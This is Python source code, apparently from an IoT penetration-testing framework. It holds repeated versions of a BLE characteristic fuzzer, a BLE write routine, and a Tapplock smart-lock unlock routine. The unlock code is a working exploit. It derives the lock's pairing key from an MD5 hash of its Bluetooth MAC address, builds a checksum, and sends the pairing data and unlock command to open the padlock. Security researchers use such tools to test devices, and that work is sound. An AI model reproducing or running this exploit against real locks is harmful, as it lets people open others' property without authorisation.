def execute(self):
"""Execute the test."""
TLog.generic(
"Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})"
.format(self.args.value, self.args.iter, hex(self.args.handle),
self.args.addr))
try:
device = BlePeripheral()
device.connect(
self.args.addr,
addrType=(Ble.ADDR_TYPE_RANDOM
if self.args.randaddrtype else Ble.ADDR_TYPE_PUBLIC),
)
for _ in range(self.args.iter):
value = self.args.value
while value.find("xx") >= 0:
value = value.replace(
"xx",
"{:02x}".format(randint(0, 0xFF)),
1 # nosec
)
TLog.trydo("Writing the fuzzed value ({})".format(value))
device.writeCharacteristic(
self.args.handle,
bytes.fromhex(value),
withResponse=(not self.args.noresponse),
)
except: # noqa: E722
self.result.exception()
finally:
device.disconnect()
def execute(self):
"""Execute the test."""
TLog.generic(
"Writing the value ({}) to handle ({}) on BLE device ({})".format(
self.args.value, hex(self.args.handle), self.args.addr
)
)
device = BlePeripheral()
try:
device.connect(
self.args.addr,
addrType=(
ADDR_TYPE_RANDOM
if self.args.randaddrtype
else ADDR_TYPE_PUBLIC
),
)
device.writeCharacteristic(
self.args.handle,
bytes.fromhex(self.args.value),
withResponse=(not self.args.noresponse),
)
except: # noqa: E722
self.result.exception()
finally:
device.disconnect()
def unlock(self, mac, name=None):
"""
Unlock the specified Tapplock.
Args:
mac(str): The BLE address of the Tapplock
name(str): The name of the Tapplock as advertised over BLE
Returns:
Nothing
"""
device = BlePeripheral()
try:
TLog.trydo("Unlocking Tapplock ({})".format(mac))
# Get key1 and serial
pairing_data = None
if self.args.default is False:
remote_mac = ":".join(mac.upper().split(":")[::-1])
md5_hash = md5(remote_mac.encode()).hexdigest() # nosec
key1 = md5_hash[0:8]
serial = md5_hash[16:24]
TLog.generic(
"(Calculated hash={})(key1={})(serial={})".format(
md5_hash, key1, serial
)
)
pairing_data = self.PAIRPREXIX + key1 + serial
else:
TLog.generic(
"(default key1={})(default serial={})".format(
self.DEFKEY, self.DEFSERIAL
)
)
pairing_data = self.DEFPAIR
# Calculate the checksum
checksum = 0
for byte in bytes.fromhex(pairing_data):
checksum = checksum + (byte % 255)
checksum_string = "{:04x}".format(checksum)
# Create the pairing data
pairing_data = pairing_data + checksum_string[2:4] + checksum_string[0:2]
device.connect(mac, addrType=ADDR_TYPE_RANDOM)
device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(pairing_data))
device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(self.UNLOCKCMD))
self.output_handler(tlogtype=TLog.TRYDO,
logkwargs=LOGPRETTY,
name=name,
addr=device.addr,
sent_pair_data=pairing_data,
sent_unlock_cmd=self.UNLOCKCMD)
finally:
device.disconnect()
def unlock(self, mac):
"""
Unlock the specified Tapplock.
:param mac: The BLE address of the Tapplock
:return:
"""
device = BlePeripheral()
try:
TLog.trydo("Unlocking Tapplock ({})".format(mac))
# Get key1 and serial
pairing_data = None
if self.args.default is False:
remote_mac = ":".join(mac.upper().split(":")[::-1])
md5_hash = md5(remote_mac.encode()).hexdigest() # nosec
key1 = md5_hash[0:8]
serial = md5_hash[16:24]
TLog.generic("(Calculated hash={})(key1={})(serial={})".format(
md5_hash, key1, serial))
pairing_data = self.PAIRPREXIX + key1 + serial
else:
TLog.generic("(default key1={})(default serial={})".format(
self.DEFKEY, self.DEFSERIAL))
pairing_data = self.DEFPAIR
# Calculate the checksum
checksum = 0
for byte in bytes.fromhex(pairing_data):
checksum = checksum + (byte % 255)
checksum_string = "{:04x}".format(checksum)
# Create the pairing data
pairing_data = pairing_data + checksum_string[
2:4] + checksum_string[0:2]
device.connect(mac, addrType=ADDR_TYPE_RANDOM)
TLog.trydo("Sending pair data({})".format(pairing_data))
device.writeCharacteristic(self.UNLOCKHNDL,
bytes.fromhex(pairing_data))
TLog.trydo("Sending unlock command({})".format(self.UNLOCKCMD))
device.writeCharacteristic(self.UNLOCKHNDL,
bytes.fromhex(self.UNLOCKCMD))
finally:
device.disconnect()
def execute(self):
TLog.generic(
"Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})"
.format(self.args.value, self.args.iter, hex(self.args.handle),
self.args.addr))
try:
d = BlePeripheral()
d.connect(self.args.addr,
addrType=(Ble.ADDR_TYPE_RANDOM if self.args.randaddrtype
else Ble.ADDR_TYPE_PUBLIC))
for i in range(self.args.iter):
f = self.args.value
while f.find("xx") >= 0:
f = f.replace("xx", "{:02x}".format(randint(0, 0xff)), 1)
TLog.trydo("Writing the fuzzed value ({})".format(f))
d.writeCharacteristic(self.args.handle,
bytes.fromhex(f),
withResponse=(not self.args.noresponse))
except:
self.result.exception()
finally:
d.disconnect()